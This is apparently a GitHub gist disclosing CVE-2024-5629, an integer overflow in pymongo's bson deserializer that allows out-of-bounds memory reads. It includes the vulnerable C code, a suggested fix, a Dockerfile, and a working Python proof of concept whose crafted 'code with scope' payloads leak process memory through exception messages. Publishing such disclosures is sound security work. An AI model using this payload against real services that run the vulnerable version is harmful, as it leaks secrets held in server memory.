Skip to content

Instantly share code, notes, and snippets.

@keltecc
Last active June 21, 2024 10:26
Show Gist options
  • Save keltecc/62a7c2bf74a997d0a7b48a0ff3853a03 to your computer and use it in GitHub Desktop.
Save keltecc/62a7c2bf74a997d0a7b48a0ff3853a03 to your computer and use it in GitHub Desktop.
[pymongo] out-of-bounds read PoC (CVE-2024-5629)

Assigned CVE: CVE-2024-5629

Snyk advisory: SNYK-PYTHON-PYMONGO-7172112

GitHub advisory: GHSA-m87m-mmvp-v9qm

GitHub commit: PYTHON-4305 Fix bson size check (#1564)

Package details

Package manager: pip

Affected module: pymongo

GitHub repo: mongodb/mongo-python-driver

Module description:

The PyMongo distribution contains tools for interacting with MongoDB database from Python. The bson package is an implementation of the BSON format for Python. The pymongo package is a native Python driver for MongoDB. The gridfs package is a gridfs implementation on top of pymongo.

Vulnerability description

Out-of-bounds read in bson module. Possible risk: leak of sensitive data.

Vulnerability: integer overflow in bson deserialization. Using the crafted payload the attacker could force the parser to deserialize unmanaged memory. The parser tries to interpret bytes next to buffer and throws an exception with string. If the following bytes are not printable UTF-8 the parser throws an exception with a single byte.

How to reproduce

I've tested it on Ubuntu 22.04.3 LTS, kernel version: 5.15.0-84-generic.

There is a simple PoC in file poc.py. The PoC contains two cases:

  1. leak of the used variable, the arbitrary string from the memory could be leaked the same way
  2. leak of 5 single non-printable bytes

You could use the provided Dockerfile in order to preserve the environment.

  1. Build the image
docker build --tag pymongo-poc .
  1. Run the image
docker run --rm pymongo-poc
  1. Expected behaviour
$ docker run --rm pymongo-poc
## case 1: leak the printable string ##
Detected unknown BSON type b'\x00' for fieldname 'XXXXXXXXXXXXXX'. Are you using the latest driver version?

## case 2: leak some non-printable bytes ##
'utf-8' codec can't decode byte 0x90 in position 1: invalid start byte
'utf-8' codec can't decode byte 0xfc in position 0: invalid start byte
'utf-8' codec can't decode byte 0x98 in position 0: invalid start byte
'utf-8' codec can't decode byte 0xf7 in position 0: invalid start byte
'utf-8' codec can't decode byte 0xff in position 0: invalid start byte

Please note that XXXXXXXXXXXXXX is a part of the secret variable. The bytes [0x90, 0xfc, 0x98, 0xf7, 0xff] could be consecutive bytes from process memory.

Vulnerability details

Actual source code is here: https://github.com/mongodb/mongo-python-driver/tree/4.6.2

The vulnerability is located in file bson/_cbsonmodule.c. The interesting part is deserialization of type 15 (JavaScript code with scope):

    case 15:
        {
            uint32_t c_w_s_size;
            uint32_t code_size;
            uint32_t scope_size;
            PyObject* code;
            PyObject* scope;
            PyObject* code_type;

            if (max < 8) {
                goto invalid;
            }

            memcpy(&c_w_s_size, buffer + *position, 4);
            c_w_s_size = BSON_UINT32_FROM_LE(c_w_s_size);
            *position += 4;

            if (max < c_w_s_size) {
                goto invalid;
            }

            memcpy(&code_size, buffer + *position, 4);
            code_size = BSON_UINT32_FROM_LE(code_size);
            /* code_w_scope length + code length + code + scope length */
            if (!code_size || max < code_size || max < 4 + 4 + code_size + 4) {
                goto invalid;
            }
            *position += 4;
            /* Strings must end in \0 */
            if (buffer[*position + code_size - 1]) {
                goto invalid;
            }
            code = PyUnicode_DecodeUTF8(
                buffer + *position, code_size - 1,
                options->unicode_decode_error_handler);
            if (!code) {
                goto invalid;
            }
            *position += code_size;

            memcpy(&scope_size, buffer + *position, 4);
            scope_size = BSON_UINT32_FROM_LE(scope_size);
            if (scope_size < BSON_MIN_SIZE) {
                Py_DECREF(code);
                goto invalid;
            }
            /* code length + code + scope length + scope */
            if ((4 + code_size + 4 + scope_size) != c_w_s_size) {
                Py_DECREF(code);
                goto invalid;
            }

            /* Check for bad eoo */
            if (buffer[*position + scope_size - 1]) {
                goto invalid;
            }
            scope = elements_to_dict(self, buffer + *position + 4,
                                     scope_size - 5, options);
            if (!scope) {
                Py_DECREF(code);
                goto invalid;
            }
            *position += scope_size;

            if ((code_type = _get_object(state->Code, "bson.code", "Code"))) {
                value = PyObject_CallFunctionObjArgs(code_type, code, scope, NULL);
                Py_DECREF(code_type);
            }
            Py_DECREF(code);
            Py_DECREF(scope);
            break;
        }

The type "code with scope" contains the function code itself (usually JavaScript) and its scope, where the scope is a mapping of closured variables. The code is straightforward so I won't describe it in details.

The vulnerable part is here:

            /* code length + code + scope length + scope */
            if ((4 + code_size + 4 + scope_size) != c_w_s_size) {
                Py_DECREF(code);
                goto invalid;
            }

Please note that variables code_size, scope_size, and c_w_s_size are controlled by attacker since they are stored in the input buffer as 4-byte integers. Since all variables are uint32_t integers it's possible to trigger integer overflow here. We can set the scope_size to "negative" value (in unsigned integers it means a "big" value) and bypass the check using crafted code_size and c_w_s_size values.

Then the scope_size is passed to elements_to_dict() function. If the variable is big enough the function will deserialize the unmanaged memory (next to buffer). This memory will be interpreted as bson structure with fields "type" and "fieldname". If we set the "type" to some invalid value (for example \x00) bson will throw the exception with "fieldname" string.

The example of trigger (from PoC file):

bytes.fromhex(
    struct.pack('<I', length).hex() + # payload size
    '0f' + # type "code with scope"
    '3100' + # key (cstring)
    '0a000000' + # c_w_s_size
    '04000000' + # code_size
    '41004200' + # code (cstring)
    'feffffff' + # scope_size
    '02' + # type "string"
    '3200' + # key (cstring)
    struct.pack('<I', string_size).hex() + # string size
    '00' * string_size # value (cstring)
    # next bytes is a field name for type \x00
    # type \x00 is invalid so bson throws an exception
)

The last '00' byte is interpreted as type \x00, the next bytes (located after the managed buffer) will be interpreted as fieldname. Since the type \x00 is invalid the fieldname will be thrown.

Suggested fix

There is a check for c_w_s_size variable only:

if (max < c_w_s_size) {
    goto invalid;
}

I would suggest to add the same checks for code_size and scope_size variables. Then it becomes impossible to trigger integer overflow here.

How it was found

Usually the deserialization process is non-trivial and difficult to implement without bugs. I read the entire bson code carefully, especially the use of integer variables, and accidentally found this.

FROM python:3.12@sha256:e83d1f4d0c735c7a54fc9dae3cca8c58473e3b3de08fcb7ba3d342ee75cfc09d
RUN pip install pymongo==4.6.2
COPY poc.py /tmp/poc.py
ENTRYPOINT python3 -u /tmp/poc.py
import bson
import struct
def function(length: int) -> bytes:
secret = b'X' * length
# do some stuff with secret
# ...
# variable 'secret' is deleted here
# but it's still stored in memory
def generate_payload(length: int) -> bytes:
string_size = length - 0x1e
return bytes.fromhex(
struct.pack('<I', length).hex() + # payload size
'0f' + # type "code with scope"
'3100' + # key (cstring)
'0a000000' + # c_w_s_size
'04000000' + # code_size
'41004200' + # code (cstring)
'feffffff' + # scope_size
'02' + # type "string"
'3200' + # key (cstring)
struct.pack('<I', string_size).hex() + # string size
'00' * string_size # value (cstring)
# next bytes is a field name for type \x00
# type \x00 is invalid so bson throws an exception
)
def deserialize_payload(payload: bytes) -> None:
try:
obj = bson.decode(payload) # throws exception
print(obj) # unreachable code
except Exception as e:
print(e)
print('## case 1: leak the printable string ##')
# uses secret internally
function(0x50 + 0x0F)
# payload could be read from stdin or similar
payload = generate_payload(0x50)
deserialize_payload(payload)
###
print('\n## case 2: leak some non-printable bytes ##')
for i in range(5):
# payload could be read from stdin or similar
payload = generate_payload(0x54f + i)
deserialize_payload(payload)
@keltecc
Copy link
Author

keltecc commented Apr 24, 2024

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment